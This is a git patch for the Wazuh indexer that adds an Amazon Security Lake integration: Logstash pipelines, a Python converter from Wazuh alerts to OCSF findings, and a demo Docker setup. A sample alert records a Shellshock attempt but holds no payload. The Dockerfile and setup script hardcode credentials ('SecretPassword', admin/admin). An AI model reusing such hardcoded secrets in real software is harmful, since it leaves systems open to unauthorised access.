From 1d801ee08560c01e70c97005d1298b3ded2f1612 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Mon, 4 Mar 2024 11:06:06 +0100 Subject: [PATCH] Fortnight #5 - Merge `4.9.0` into `master` (#173) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Add events generator tool for `wazuh-alerts` (#152) * Add events generator tool for wazuh-alerts * Fix typo in README.md Signed-off-by: Álex Ruiz * Make timestamps timezone aware --------- Signed-off-by: Álex Ruiz Co-authored-by: Fede Tux * Add `wazuh.manager.name` to VD mappings (#158) * Create compatibility_request.md (#163) Signed-off-by: Álex Ruiz * Add Python module to accomplish OCSF compliant events (#159) * Adding Python script that receives a continuous json stream over stdin and outputs parquet to Security Lake * Adding logstash pipeline for python script * encode_parquet() function fixed to handle lists of dictionaries * Correct error in encode_parquet() * Avoid storing the block ending in the output buffer * Add comments on handling files and streams with pyarrow for future reference * Add s3 handling reference links * Write parquet directly to bucket * Added basics of map_to_ocsf() function * Minor fixes * Map alerts to OCSF as they are read * Add script to convert Wazuh events to OCSF Also adds a simple test script * Add OCSF converter + Parquet encoder + test scripts * Update .gitignore * Include the contents of the alert under unmapped * Add support for different OCSF schema versions * Use custom ocsf module to map alerts * Modify script to use converter class * Code polish and fix errors * Remove unnecessary type declaration from debug flag * Improved parquet encoding * Initial commit for test env's docker-compose.yml * Remove sudo references from docker-compose.yml * Add operational Python module to transform events to OCSF * Create minimal Docker environment to test and develop the integration. * Fix events-generator's Inventory starvation * Remove files present in #147 * Cleanup * Add FQDN hostnames to services for certificates creation * Add S3 Ninja (Mock) (#165) * Setup certificates in Wazuh Indexer and Logstash containers (#166) * Add certificate generator service * Add certificate config to docker compose file * Use secrets for certificates * Disable permission handling inside cert's generator entrypoint.sh * Back to using a bind mount for certs * Have entrypoint.sh generate certs with 1000:1000 ownership * Correct certificate permissions and bind mounting * Add security initialization variable to compose file * Fix permissions on certs generator entrypoint * Add cert generator config file * Remove old cert generator dir * Set indexer hostname right in pipeline file * Roll back commented code --------- Signed-off-by: Álex Ruiz Co-authored-by: Álex Ruiz * Fix Logstash pipelines * Remove unused file * Implement OCSF severity normalize function --------- Signed-off-by: Álex Ruiz Co-authored-by: Fede Tux Co-authored-by: Federico Gustavo Galland <99492720+f-galland@users.noreply.github.com> --------- Signed-off-by: Álex Ruiz Co-authored-by: Fede Tux Co-authored-by: Federico Gustavo Galland <99492720+f-galland@users.noreply.github.com> --- .../ISSUE_TEMPLATE/compatibility_request.md | 23 + .../event-generator/event_generator.py | 3 + .../fields/custom/wazuh.yml | 7 +- integrations/.gitignore | 6 + integrations/README.md | 37 + .../amazon-security-lake/.dockerignore | 180 +++ integrations/amazon-security-lake/.gitignore | 179 +++ integrations/amazon-security-lake/Dockerfile | 41 + integrations/amazon-security-lake/README.md | 15 +- .../logstash/pipeline/indexer-to-file.conf | 28 + .../pipeline/indexer-to-integrator.conf | 30 + .../pipeline/indexer-to-s3.conf} | 11 +- .../amazon-security-lake/logstash/setup.sh | 10 + .../amazon-security-lake/parquet/parquet.py | 20 + .../amazon-security-lake/parquet/test.py | 10 + .../amazon-security-lake/requirements.txt | 3 + integrations/amazon-security-lake/run.py | 26 + .../transform/__init__.py | 1 + .../transform/converter.py | 98 ++ .../transform/models/__init__.py | 2 + .../transform/models/ocsf.py | 66 ++ .../transform/models/wazuh.py | 50 + .../wazuh-event.sample.json | 76 ++ integrations/docker/amazon-security-lake.yml | 115 ++ integrations/docker/config/certs.yml | 16 + .../tools/events-generator/.dockerignore | 2 + .../tools/events-generator/.gitignore | 1 + .../tools/events-generator/Dockerfile | 4 + integrations/tools/events-generator/README.md | 54 + .../tools/events-generator/requirements.txt | 1 + integrations/tools/events-generator/run.py | 219 ++++ .../events-generator/wazuh-alerts/alerts.json | 1000 +++++++++++++++++ 32 files changed, 2327 insertions(+), 7 deletions(-) create mode 100644 .github/ISSUE_TEMPLATE/compatibility_request.md create mode 100644 integrations/.gitignore create mode 100644 integrations/README.md create mode 100644 integrations/amazon-security-lake/.dockerignore create mode 100644 integrations/amazon-security-lake/.gitignore create mode 100644 integrations/amazon-security-lake/Dockerfile create mode 100644 integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf create mode 100644 integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf rename integrations/amazon-security-lake/{wazuh-s3.conf => logstash/pipeline/indexer-to-s3.conf} (78%) create mode 100644 integrations/amazon-security-lake/logstash/setup.sh create mode 100644 integrations/amazon-security-lake/parquet/parquet.py create mode 100644 integrations/amazon-security-lake/parquet/test.py create mode 100644 integrations/amazon-security-lake/requirements.txt create mode 100644 integrations/amazon-security-lake/run.py create mode 100644 integrations/amazon-security-lake/transform/__init__.py create mode 100644 integrations/amazon-security-lake/transform/converter.py create mode 100644 integrations/amazon-security-lake/transform/models/__init__.py create mode 100644 integrations/amazon-security-lake/transform/models/ocsf.py create mode 100644 integrations/amazon-security-lake/transform/models/wazuh.py create mode 100644 integrations/amazon-security-lake/wazuh-event.sample.json create mode 100644 integrations/docker/amazon-security-lake.yml create mode 100644 integrations/docker/config/certs.yml create mode 100644 integrations/tools/events-generator/.dockerignore create mode 100644 integrations/tools/events-generator/.gitignore create mode 100644 integrations/tools/events-generator/Dockerfile create mode 100644 integrations/tools/events-generator/README.md create mode 100644 integrations/tools/events-generator/requirements.txt create mode 100644 integrations/tools/events-generator/run.py create mode 100644 integrations/tools/events-generator/wazuh-alerts/alerts.json diff --git a/.github/ISSUE_TEMPLATE/compatibility_request.md b/.github/ISSUE_TEMPLATE/compatibility_request.md new file mode 100644 index 0000000000000..7a79b2de9d35e --- /dev/null +++ b/.github/ISSUE_TEMPLATE/compatibility_request.md @@ -0,0 +1,23 @@ +--- +name: Compatibility request +about: Suggest supporting a new version of OpenSearch +title: 'Compatibility with OpenSearch (version)' +labels: compatibility, level/task, type/research +assignees: '' + +--- + +## Description +We need to ensure the compatibility with the next version of OpenSearch vX.X. +This update is still being discussed, but we need to be aware of potential issues. + +For that, we need to: + +- [ ] Review opensearch's release notes. +- [ ] Identify improvements and potential impact. +- [ ] Create new development branch. +- [ ] Develop a testing environment to verify our components would work under this new build. + + +## Issues +- _List here the detected issues_ diff --git a/ecs/vulnerability-detector/event-generator/event_generator.py b/ecs/vulnerability-detector/event-generator/event_generator.py index 7fc69fb5ea732..24ecf744b8272 100755 --- a/ecs/vulnerability-detector/event-generator/event_generator.py +++ b/ecs/vulnerability-detector/event-generator/event_generator.py @@ -173,6 +173,9 @@ def generate_random_wazuh(): 'cluster': { 'name': f'wazuh-cluster-{random.randint(0,10)}', 'node': f'wazuh-cluster-node-{random.randint(0,10)}' + }, + 'manager': { + 'name': f'wazuh-manager-{random.randint(0,10)}' } } return wazuh diff --git a/ecs/vulnerability-detector/fields/custom/wazuh.yml b/ecs/vulnerability-detector/fields/custom/wazuh.yml index 4f8b0c6f21173..abba5563e2c12 100644 --- a/ecs/vulnerability-detector/fields/custom/wazuh.yml +++ b/ecs/vulnerability-detector/fields/custom/wazuh.yml @@ -13,4 +13,9 @@ type: keyword level: custom description: > - Wazuh cluster node name. \ No newline at end of file + Wazuh cluster node name. + - name: manager.name + type: keyword + level: custom + description: > + Wazuh manager name. Used by dashboards to filter results on single node deployments. \ No newline at end of file diff --git a/integrations/.gitignore b/integrations/.gitignore new file mode 100644 index 0000000000000..ee1a01f52633d --- /dev/null +++ b/integrations/.gitignore @@ -0,0 +1,6 @@ +elastic +opensearch +splunk +common +config +docker/certs \ No newline at end of file diff --git a/integrations/README.md b/integrations/README.md new file mode 100644 index 0000000000000..ae3253b8547b8 --- /dev/null +++ b/integrations/README.md @@ -0,0 +1,37 @@ +## Wazuh indexer integrations + +This folder contains integrations with third-party XDR, SIEM and cybersecurity software. +The goal is to transport Wazuh's analysis to the platform that suits your needs. + +### Amazon Security Lake + +Amazon Security Lake automatically centralizes security data from AWS environments, SaaS providers, +on premises, and cloud sources into a purpose-built data lake stored in your account. With Security Lake, +you can get a more complete understanding of your security data across your entire organization. You can +also improve the protection of your workloads, applications, and data. Security Lake has adopted the +Open Cybersecurity Schema Framework (OCSF), an open standard. With OCSF support, the service normalizes +and combines security data from AWS and a broad range of enterprise security data sources. + +##### Usage + +A demo of the integration can be started using the content of this folder and Docker. + +```console +docker compose -f ./docker/amazon-security-lake.yml up -d +``` + +This docker compose project will bring a *wazuh-indexer* node, a *wazuh-dashboard* node, +a *logstash* node and our event generator. On the one hand, the event generator will push events +constantly to the indexer. On the other hand, logstash will constantly query for new data and +deliver it to the integration Python program, also present in that node. Finally, the integration +module will prepare and send the data to the Amazon Security Lake's S3 bucket. + + +For production usage, follow the instructions in our documentation page about this matter. +(_when-its-done_) + +As a last note, we would like to point out that we also use this Docker environment for development. + +### Other integrations + +TBD diff --git a/integrations/amazon-security-lake/.dockerignore b/integrations/amazon-security-lake/.dockerignore new file mode 100644 index 0000000000000..891ff7a135014 --- /dev/null +++ b/integrations/amazon-security-lake/.dockerignore @@ -0,0 +1,180 @@ +wazuh-event.ocsf.json +*.parquet +Dockerfile + +# Created by https://www.toptal.com/developers/gitignore/api/python +# Edit at https://www.toptal.com/developers/gitignore?templates=python + +### Python ### +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions +*.so + +# Distribution / packaging +.Python +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +share/python-wheels/ +*.egg-info/ +.installed.cfg +*.egg +MANIFEST + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.nox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +*.py,cover +.hypothesis/ +.pytest_cache/ +cover/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py +db.sqlite3 +db.sqlite3-journal + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +.pybuilder/ +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# IPython +profile_default/ +ipython_config.py + +# pyenv +# For a library or package, you might want to ignore these files since the code is +# intended to run in multiple environments; otherwise, check them in: +# .python-version + +# pipenv +# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. +# However, in case of collaboration, if having platform-specific dependencies or dependencies +# having no cross-platform support, pipenv may install dependencies that don't work, or not +# install all needed dependencies. +#Pipfile.lock + +# poetry +# Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control. +# This is especially recommended for binary packages to ensure reproducibility, and is more +# commonly ignored for libraries. +# https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control +#poetry.lock + +# pdm +# Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control. +#pdm.lock +# pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it +# in version control. +# https://pdm.fming.dev/#use-with-ide +.pdm.toml + +# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm +__pypackages__/ + +# Celery stuff +celerybeat-schedule +celerybeat.pid + +# SageMath parsed files +*.sage.py + +# Environments +.env +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ +.dmypy.json +dmypy.json + +# Pyre type checker +.pyre/ + +# pytype static type analyzer +.pytype/ + +# Cython debug symbols +cython_debug/ + +# PyCharm +# JetBrains specific template is maintained in a separate JetBrains.gitignore that can +# be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore +# and can be added to the global gitignore or merged into this file. For a more nuclear +# option (not recommended) you can uncomment the following to ignore the entire idea folder. +#.idea/ + +### Python Patch ### +# Poetry local configuration file - https://python-poetry.org/docs/configuration/#local-configuration +poetry.toml + +# ruff +.ruff_cache/ + +# LSP config files +pyrightconfig.json + +# End of https://www.toptal.com/developers/gitignore/api/python \ No newline at end of file diff --git a/integrations/amazon-security-lake/.gitignore b/integrations/amazon-security-lake/.gitignore new file mode 100644 index 0000000000000..0740f723d0c79 --- /dev/null +++ b/integrations/amazon-security-lake/.gitignore @@ -0,0 +1,179 @@ +wazuh-event.ocsf.json +*.parquet + +# Created by https://www.toptal.com/developers/gitignore/api/python +# Edit at https://www.toptal.com/developers/gitignore?templates=python + +### Python ### +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions +*.so + +# Distribution / packaging +.Python +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +share/python-wheels/ +*.egg-info/ +.installed.cfg +*.egg +MANIFEST + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.nox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +*.py,cover +.hypothesis/ +.pytest_cache/ +cover/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py +db.sqlite3 +db.sqlite3-journal + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +.pybuilder/ +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# IPython +profile_default/ +ipython_config.py + +# pyenv +# For a library or package, you might want to ignore these files since the code is +# intended to run in multiple environments; otherwise, check them in: +# .python-version + +# pipenv +# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. +# However, in case of collaboration, if having platform-specific dependencies or dependencies +# having no cross-platform support, pipenv may install dependencies that don't work, or not +# install all needed dependencies. +#Pipfile.lock + +# poetry +# Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control. +# This is especially recommended for binary packages to ensure reproducibility, and is more +# commonly ignored for libraries. +# https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control +#poetry.lock + +# pdm +# Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control. +#pdm.lock +# pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it +# in version control. +# https://pdm.fming.dev/#use-with-ide +.pdm.toml + +# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm +__pypackages__/ + +# Celery stuff +celerybeat-schedule +celerybeat.pid + +# SageMath parsed files +*.sage.py + +# Environments +.env +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ +.dmypy.json +dmypy.json + +# Pyre type checker +.pyre/ + +# pytype static type analyzer +.pytype/ + +# Cython debug symbols +cython_debug/ + +# PyCharm +# JetBrains specific template is maintained in a separate JetBrains.gitignore that can +# be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore +# and can be added to the global gitignore or merged into this file. For a more nuclear +# option (not recommended) you can uncomment the following to ignore the entire idea folder. +#.idea/ + +### Python Patch ### +# Poetry local configuration file - https://python-poetry.org/docs/configuration/#local-configuration +poetry.toml + +# ruff +.ruff_cache/ + +# LSP config files +pyrightconfig.json + +# End of https://www.toptal.com/developers/gitignore/api/python \ No newline at end of file diff --git a/integrations/amazon-security-lake/Dockerfile b/integrations/amazon-security-lake/Dockerfile new file mode 100644 index 0000000000000..a2eec0f8d6075 --- /dev/null +++ b/integrations/amazon-security-lake/Dockerfile @@ -0,0 +1,41 @@ +# MULTI-STAGE build + +FROM python:3.9 as builder +# Create a virtualenv for dependencies. This isolates these packages from +# system-level packages. +RUN python3 -m venv /env +# Setting these environment variables are the same as running +# source /env/bin/activate. +ENV VIRTUAL_ENV /env +ENV PATH /env/bin:$PATH +# Copy the application's requirements.txt and run pip to install all +# dependencies into the virtualenv. +COPY requirements.txt /app/requirements.txt +RUN pip install -r /app/requirements.txt + + +FROM python:3.9 +ENV LOGSTASH_KEYSTORE_PASS="SecretPassword" +# Add the application source code. +COPY --chown=logstash:logstash . /home/app +# Add execution persmissions. +RUN chmod a+x /home/app/run.py +# Copy the application's dependencies. +COPY --from=builder /env /env + +# Install Logstash +RUN apt-get update && apt-get install -y iputils-ping wget gpg apt-transport-https +RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ + echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ + apt-get update && apt install -y logstash +# Install logstash-input-opensearch plugin. +RUN /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch +# Copy the Logstash's ingestion pipelines. +COPY --chown=logstash:logstash logstash/pipeline /usr/share/logstash/pipeline +# Grant logstash ownership over its files +RUN chown --recursive logstash:logstash /usr/share/logstash /etc/logstash /var/log/logstash /var/lib/logstash + +USER logstash +# Copy and run the setup.sh script to create and configure a keystore for Logstash. +COPY --chown=logstash:logstash logstash/setup.sh /usr/share/logstash/bin/setup.sh +RUN bash /usr/share/logstash/bin/setup.sh \ No newline at end of file diff --git a/integrations/amazon-security-lake/README.md b/integrations/amazon-security-lake/README.md index 46eee1b92a4b0..1dbe1dd4ebb23 100644 --- a/integrations/amazon-security-lake/README.md +++ b/integrations/amazon-security-lake/README.md @@ -46,4 +46,17 @@ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/wazuh-s3.conf - # Start Logstash sudo systemctl enable logstash sudo systemctl start logstash -``` \ No newline at end of file +``` + + +### Building the Docker image + +```console +docker build -t wazuh/indexer-security-lake-integration:latest . --progress=plain +``` + + +Run with: +```console +docker run -it --name=wazuh-indexer-security-lake-integration --rm wazuh/indexer-security-lake-integration ls +``` diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf new file mode 100644 index 0000000000000..4d5a47169e197 --- /dev/null +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf @@ -0,0 +1,28 @@ +input { + opensearch { + hosts => ["wazuh.indexer:9200"] + user => "${INDEXER_USERNAME}" + password => "${INDEXER_PASSWORD}" + ssl => true + ca_file => "/usr/share/logstash/root-ca.pem" + index => "wazuh-alerts-4.x-*" + query => '{ + "query": { + "range": { + "@timestamp": { + "gt": "now-1m" + } + } + } + }' + target => "_source" + schedule => "* * * * *" + } +} + + +output { + file { + path => "/usr/share/logstash/pipeline/indexer-to-file.json" + } +} diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf new file mode 100644 index 0000000000000..81a4bdad5883a --- /dev/null +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf @@ -0,0 +1,30 @@ +input { + opensearch { + hosts => ["wazuh.indexer:9200"] + user => "${INDEXER_USERNAME}" + password => "${INDEXER_PASSWORD}" + ssl => true + ca_file => "/usr/share/logstash/root-ca.pem" + index => "wazuh-alerts-4.x-*" + query => '{ + "query": { + "range": { + "@timestamp": { + "gt": "now-1m" + } + } + } + }' + target => "_source" + schedule => "* * * * *" + } +} + +output { + pipe { + id => "securityLake" + message_format => "%{_source}" + ttl => "10" + command => "/usr/bin/env python3 /usr/local/bin/run.py -d" + } +} diff --git a/integrations/amazon-security-lake/wazuh-s3.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf similarity index 78% rename from integrations/amazon-security-lake/wazuh-s3.conf rename to integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf index 108423afd3193..22d44b9d0d3f5 100644 --- a/integrations/amazon-security-lake/wazuh-s3.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf @@ -1,11 +1,11 @@ input { opensearch { - hosts => ["localhost:9200"] - user => "${WAZUH_INDEXER_USERNAME}" - password => "${WAZUH_INDEXER_PASSWORD}" - index => "wazuh-alerts-4.x-*" + hosts => ["wazuh.indexer:9200"] + user => "${INDEXER_USERNAME}" + password => "${INDEXER_PASSWORD}" ssl => true - ca_file => "/etc/logstash/wi-certs/root-ca.pem" + ca_file => "/usr/share/logstash/root-ca.pem" + index => "wazuh-alerts-4.x-*" query => '{ "query": { "range": { @@ -15,6 +15,7 @@ input { } } }' + target => "_source" schedule => "* * * * *" } } diff --git a/integrations/amazon-security-lake/logstash/setup.sh b/integrations/amazon-security-lake/logstash/setup.sh new file mode 100644 index 0000000000000..9527f1fa58362 --- /dev/null +++ b/integrations/amazon-security-lake/logstash/setup.sh @@ -0,0 +1,10 @@ +#!/usr/bin/bash + +# This script creates and configures a keystore for Logstash to store +# indexer's credentials. NOTE: works only for dockerized logstash. +# Source: https://www.elastic.co/guide/en/logstash/current/keystore.html + +# Create keystore +/usr/share/logstash/bin/logstash-keystore create --path.settings /etc/logstash +echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_USERNAME --path.settings /etc/logstash +echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_PASSWORD --path.settings /etc/logstash diff --git a/integrations/amazon-security-lake/parquet/parquet.py b/integrations/amazon-security-lake/parquet/parquet.py new file mode 100644 index 0000000000000..79a146f0993a2 --- /dev/null +++ b/integrations/amazon-security-lake/parquet/parquet.py @@ -0,0 +1,20 @@ + +import pyarrow as pa +import pyarrow.parquet as pq +import pyarrow.fs as pafs + + +class Parquet: + + @staticmethod + def encode(data: dict): + return pa.Table.from_pydict(data) + + @staticmethod + def to_s3(data: pa.Table, s3: pafs.S3FileSystem): + pass + + @staticmethod + def to_file(data: pa.Table, path: str): + # pq.write_to_dataset(table=data, root_path=path) + pq.write_table(data, path) diff --git a/integrations/amazon-security-lake/parquet/test.py b/integrations/amazon-security-lake/parquet/test.py new file mode 100644 index 0000000000000..318da6ebe4740 --- /dev/null +++ b/integrations/amazon-security-lake/parquet/test.py @@ -0,0 +1,10 @@ +#!/usr/bin/python + +import pyarrow as pa +from parquet import Parquet +import json + +with open("wazuh-event.ocsf.json", "r") as fd: + events = [json.load(fd)] + table = pa.Table.from_pylist(events) + Parquet.to_file(table, "output/wazuh-event.ocsf.parquet") diff --git a/integrations/amazon-security-lake/requirements.txt b/integrations/amazon-security-lake/requirements.txt new file mode 100644 index 0000000000000..8ebe50a4ef264 --- /dev/null +++ b/integrations/amazon-security-lake/requirements.txt @@ -0,0 +1,3 @@ +pyarrow>=10.0.1 +parquet-tools>=0.2.15 +pydantic==2.6.1 \ No newline at end of file diff --git a/integrations/amazon-security-lake/run.py b/integrations/amazon-security-lake/run.py new file mode 100644 index 0000000000000..c26adffa2ea0f --- /dev/null +++ b/integrations/amazon-security-lake/run.py @@ -0,0 +1,26 @@ +#!/env/bin/python3.9 + +import transform +import json + + +def _test(): + ocsf_event = {} + with open("./wazuh-event.sample.json", "r") as fd: + # Load from file descriptor + raw_event = json.load(fd) + try: + event = transform.converter.from_json(raw_event) + print(event) + ocsf_event = transform.converter.to_detection_finding(event) + print("") + print("--") + print("") + print(ocsf_event) + + except KeyError as e: + raise (e) + + +if __name__ == '__main__': + _test() diff --git a/integrations/amazon-security-lake/transform/__init__.py b/integrations/amazon-security-lake/transform/__init__.py new file mode 100644 index 0000000000000..6e8733a32b85d --- /dev/null +++ b/integrations/amazon-security-lake/transform/__init__.py @@ -0,0 +1 @@ +import transform.converter diff --git a/integrations/amazon-security-lake/transform/converter.py b/integrations/amazon-security-lake/transform/converter.py new file mode 100644 index 0000000000000..90f8eeef27bac --- /dev/null +++ b/integrations/amazon-security-lake/transform/converter.py @@ -0,0 +1,98 @@ +import json + +import pydantic +import transform.models as models + + +def normalize(level: int) -> int: + """ + Normalizes rule level into the 0-6 range, required by OCSF. + """ + if level >= 15: # (5) Critical + severity = 5 + elif level >= 11: # (4) High + severity = 4 + elif level >= 8: # (3) Medium + severity = 3 + elif level >= 4: # (2) Low + severity = 2 + elif level >= 0: # (1) Informational + severity = 1 + else: + severity = 0 # (0) Unknown + + return severity + + +def join(iterable, separator=","): + return (separator.join(iterable)) + + +def to_detection_finding(event: models.wazuh.Event) -> models.ocsf.DetectionFinding: + finding_info = models.ocsf.FindingInfo( + analytic=models.ocsf.AnalyticInfo( + category=", ".join(event.rule.groups), + name=event.decoder.name, + type_id=1, + uid=event.rule.id + ), + attacks=models.ocsf.AttackInfo( + tactic=models.ocsf.TechniqueInfo( + name=", ".join(event.rule.mitre.tactic), + uid=", ".join(event.rule.mitre.id) + ), + technique=models.ocsf.TechniqueInfo( + name=", ".join(event.rule.mitre.technique), + uid=", ".join(event.rule.mitre.id) + ), + version="v13.1" + ), + title=event.rule.description, + types=[event.input.type], + uid=event.id + ) + + metadata = models.ocsf.Metadata( + log_name="Security events", + log_provider="Wazuh", + product=models.ocsf.ProductInfo( + name="Wazuh", + lang="en", + vendor_name="Wazuh, Inc,." + ), + version="1.1.0" + ) + + resources = [models.ocsf.Resource( + name=event.agent.name, uid=event.agent.id)] + + severity_id = normalize(event.rule.level) + + unmapped = { + "data_sources": [ + event.location, + event.manager.name + ], + "nist": event.rule.nist_800_53 # Array + } + + return models.ocsf.DetectionFinding( + count=event.rule.firedtimes, + message=event.rule.description, + finding_info=finding_info, + metadata=metadata, + raw_data=event.full_log, + resources=resources, + risk_score=event.rule.level, + severity_id=severity_id, + time=event.timestamp, + unmapped=unmapped + ) + + +def from_json(event: dict) -> models.wazuh.Event: + # Needs to a string, bytes or bytearray + try: + return models.wazuh.Event.model_validate_json(json.dumps(event)) + except pydantic.ValidationError as e: + print(e) diff --git a/integrations/amazon-security-lake/transform/models/__init__.py b/integrations/amazon-security-lake/transform/models/__init__.py new file mode 100644 index 0000000000000..2fdec7bc648af --- /dev/null +++ b/integrations/amazon-security-lake/transform/models/__init__.py @@ -0,0 +1,2 @@ +import transform.models.wazuh +import transform.models.ocsf diff --git a/integrations/amazon-security-lake/transform/models/ocsf.py b/integrations/amazon-security-lake/transform/models/ocsf.py new file mode 100644 index 0000000000000..4918b6e29081c --- /dev/null +++ b/integrations/amazon-security-lake/transform/models/ocsf.py @@ -0,0 +1,66 @@ +import pydantic +import typing + + +class AnalyticInfo(pydantic.BaseModel): + category: str + name: str + type_id: int + uid: str + + +class TechniqueInfo(pydantic.BaseModel): + name: str + uid: str + + +class AttackInfo(pydantic.BaseModel): + tactic: TechniqueInfo + technique: TechniqueInfo + version: str + + +class FindingInfo(pydantic.BaseModel): + analytic: AnalyticInfo + attacks: AttackInfo + title: str + types: typing.List[str] + uid: str + + +class ProductInfo(pydantic.BaseModel): + name: str + lang: str + vendor_name: str + + +class Metadata(pydantic.BaseModel): + log_name: str + log_provider: str + product: ProductInfo + version: str + + +class Resource(pydantic.BaseModel): + name: str + uid: str + + +class DetectionFinding(pydantic.BaseModel): + activity_id: int = 1 + category_name: str = "Findings" + category_uid: int = 2 + class_name: str = "Detection Finding" + class_uid: int = 2004 + count: int + message: str + finding_info: FindingInfo + metadata: Metadata + raw_data: str + resources: typing.List[Resource] + risk_score: int + severity_id: int + status_id: int = 99 + time: str + type_uid: int = 200401 + unmapped: typing.Dict[str, typing.List[str]] = pydantic.Field() diff --git a/integrations/amazon-security-lake/transform/models/wazuh.py b/integrations/amazon-security-lake/transform/models/wazuh.py new file mode 100644 index 0000000000000..34aa3c91e96e1 --- /dev/null +++ b/integrations/amazon-security-lake/transform/models/wazuh.py @@ -0,0 +1,50 @@ +import pydantic +import typing + +# =========== Wazuh event models =========== # +# These are only the fields required for the integration. + + +class Mitre(pydantic.BaseModel): + technique: typing.List[str] = [] + id: typing.List[str] = "" + tactic: typing.List[str] = [] + + +class Rule(pydantic.BaseModel): + firedtimes: int = 0 + description: str = "" + groups: typing.List[str] = [] + id: str = "" + mitre: Mitre = Mitre() + level: int = 0 + nist_800_53: typing.List[str] = [] + + +class Decoder(pydantic.BaseModel): + name: str + + +class Input(pydantic.BaseModel): + type: str + + +class Agent(pydantic.BaseModel): + name: str + id: str + + +class Manager(pydantic.BaseModel): + name: str + + +class Event(pydantic.BaseModel): + rule: Rule = {} + decoder: Decoder = {} + input: Input = {} + id: str = "" + full_log: str = "" + agent: Agent = {} + timestamp: str = "" + location: str = "" + manager: Manager = {} diff --git a/integrations/amazon-security-lake/wazuh-event.sample.json b/integrations/amazon-security-lake/wazuh-event.sample.json new file mode 100644 index 0000000000000..d7e0558b62c62 --- /dev/null +++ b/integrations/amazon-security-lake/wazuh-event.sample.json @@ -0,0 +1,76 @@ +{ + "input": { + "type": "log" + }, + "agent": { + "name": "redacted.com", + "id": "000" + }, + "manager": { + "name": "redacted.com" + }, + "data": { + "protocol": "GET", + "srcip": "000.111.222.10", + "id": "404", + "url": "/cgi-bin/jarrewrite.sh" + }, + "rule": { + "firedtimes": 1, + "mail": false, + "level": 6, + "pci_dss": [ + "11.4" + ], + "tsc": [ + "CC6.1", + "CC6.8", + "CC7.2", + "CC7.3" + ], + "description": "Shellshock attack attempt", + "groups": [ + "web", + "accesslog", + "attack" + ], + "mitre": { + "technique": [ + "Exploitation for Privilege Escalation", + "Exploit Public-Facing Application" + ], + "id": [ + "T1068", + "T1190" + ], + "tactic": [ + "Privilege Escalation", + "Initial Access" + ] + }, + "id": "31166", + "nist_800_53": [ + "SI.4" + ], + "info": 